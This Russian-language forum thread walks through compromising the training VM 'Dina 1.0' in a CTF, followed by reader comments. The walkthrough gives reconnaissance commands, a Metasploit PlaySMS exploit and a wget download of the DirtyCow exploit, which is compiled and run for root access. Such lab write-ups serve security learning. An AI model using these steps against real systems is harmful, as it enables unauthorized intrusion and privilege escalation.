ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   CTF. Hack The Dina 1.0 (https://forum.antichat.xyz/showthread.php?t=1623473)

Vander 28.05.2018 16:41

Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.

Взяли несложную Dina 1.0.

https://forum.antichat.xyz/attachmen...7510758133.png

Для начала, как обычно немного разведки:

Код:


Код:

netdiscover
https://forum.antichat.xyz/attachmen...7510802301.png

Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:

Код:


Код:

nmap –sV –A 192.168.0.107
https://forum.antichat.xyz/attachmen...7510852600.png

Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:

https://forum.antichat.xyz/attachmen...7510867065.png

Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.

Код:


Код:

nikto –h 192.168.0.107
https://forum.antichat.xyz/attachmen...7510900817.png

Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.

Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.

https://forum.antichat.xyz/attachmen...7510914002.png

Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.

https://forum.antichat.xyz/attachmen...7510926310.png

Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:

Код:


Код:

msfconsole
search playsms

https://forum.antichat.xyz/attachmen...7510977810.png

По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:

https://forum.antichat.xyz/attachmen...7510991006.png

Запускаем:

Код:


Код:

exploit
https://forum.antichat.xyz/attachmen...7511014802.png

Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:

Код:


Код:

shell
python -c 'import pty;pty.spawn("/bin/bash")'

https://forum.antichat.xyz/attachmen...7511039160.png

Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:

Код:


Код:

wget https://www.exploit-db.com/download/40839.c --no-check-certificate
https://forum.antichat.xyz/attachmen...7511063758.png

Переименуем и скомпилируем:

Код:


Код:

gcc -pthread dirty.c -o dirty –lcrypt
https://forum.antichat.xyz/attachmen...7511085544.png

Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:

Код:


Код:

./dirthy
https://forum.antichat.xyz/attachmen...7511116547.png

Переподключаемся к шеллу и меняем пользователя на firefart:

Код:


Код:

su
https://forum.antichat.xyz/attachmen...7511155492.png

Теперь осталось взять флаг:

Код:


Код:

cd /root
cat flag.txt

https://forum.antichat.xyz/attachmen...7511204493.png

На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.

P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)

https://forum.antichat.xyz/attachmen...7511220878.png

NeskO 28.05.2018 18:44

Интересно...

Tihon49 28.05.2018 19:38

Ищщщё!! )

Tihon49 30.05.2018 09:17

Цитата:


Tihon49 сказал(а):

Ищщщё!! )


не рабоает следующая строчка:

выдает такое сообщение:

Vander 30.05.2018 10:20

Цитата:


Tihon49 сказал(а):

не рабоает следующая строчка:


В папку /tmp копируй

Qmakake 30.05.2018 18:36

Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))

Tihon49 30.05.2018 18:58

Цитата:


Qmakake сказал(а):

Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))


Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут

Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а.

NeskO 30.05.2018 22:41

Цитата:


Tihon49 сказал(а):

Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут

Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а.

Я как раз щас качаю ее)

Tihon49 30.05.2018 22:52

Честно говоря сам только узнал про такую интересную тему как Capture The Flag. Очень интересно! Сейчас качаю другие. Буду пробовать додумать сам, хоть что-нибудь!

Tihon49 31.05.2018 11:54

Перестал работать netdiscover...
Только роутер видит. Пробовал, зачем-то, запустить xerosploit, так и он перестал работать, просит xettercap, с которым ещё вчера проблем не было.
С чего вдруг такое могло произойти?
Как мне думается это произошло после того как я запустил команду apt-get dist-upgrade. До этого я сидел на версии кали 2017.1
Бывалые, поможите чем можИте?
Я честно искал как исправить...


Время: 23:46